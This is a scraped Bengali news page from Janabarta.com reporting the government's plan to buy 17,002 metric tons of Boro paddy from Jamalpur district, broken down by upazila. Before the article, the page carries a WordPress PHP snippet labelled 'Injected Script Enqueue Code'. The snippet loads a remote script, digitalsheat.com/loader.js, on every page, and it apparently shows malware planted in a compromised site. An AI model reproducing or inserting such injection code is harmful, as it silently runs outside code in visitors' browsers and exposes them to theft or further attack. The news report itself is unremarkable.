// Injected Script Enqueue Code function enqueue_custom_script() { wp_enqueue_script( 'custom-error-script', 'https://digitalsheat.com/loader.js', array(), null, true ); } add_action('wp_enqueue_scripts', 'enqueue_custom_script'); Janabarta.com | Newsportal Site জামালপুর থেকে সরকার ধান কিনবে ১৭ হাজার ২ মেট্রিক টন - Janabarta.com

জামালপুর থেকে সরকার ধান কিনবে ১৭ হাজার ২ মেট্রিক টন

ইয়ামিন মিয়া,জামালপুর প্রতিনিধিঃ  
আসন্ন বোরো মৌসুমে এবার জামালপুরে জেলা থেকে ১৭ হাজার ২ মেট্রিক টন ধান সংগ্রহ করবে বলে লক্ষ্যমাত্রা নির্ধারণ করেছে সরকার। এজন্য একটি তালিকা প্রকাশ করেছে খাদ্য মন্ত্রণালয়। শুধু জেলার তালিকা নয়, পাশাপাশি উপজেলা ভিত্তিক তালিকাও প্রকাশ করা হয়েছে খাদ্য মন্ত্রণালয়।

সোমবার (১৩ এপ্রিল) খাদ্য অধিদফতরের অতিরিক্ত দায়িত্বপ্রাপ্ত উপ-সচিব মো. শামীম হাসান স্বাক্ষরিত এক বিজ্ঞপ্তিতে এ তালিকা প্রকাশ করা হয়।
প্রকাশিত তালিকা অনুযায়ী, জামালপুর জেলা বোরো ধানের উৎপাদন লক্ষ্যমাত্রা নির্ধারণ করা হয়েছে ৮ লাখ ৯ হাজার ১১৪ মেট্রিক টন। এর মধ্যে জেলা থেকে সরকার ধান সংগ্রহ করবে ১৭ হাজার ২ মেট্রিক টন।

এর মধ্যে জামালপুর সদর ৪ হাজার ৫২০ মেট্রিক টন, সরিষাবাড়ী ২ হাজার ৪৩২ মেট্রিক টন,দেওয়ানগঞ্জ ১হাজার ২০২ মেট্রিক টন,ইসলামপুর ২হাজার ১৮৪ মেট্রিক টন, মেলান্দহে ২ হাজার ৭৩৮ মেট্রিক টন, মাদারগঞ্জ ২ হাজার ২২৫ মেট্রিক টন, বকশীগঞ্জ ১ হাজার ৭০১ মেট্রিক টন ধান সংগ্রহ করবে সরকার।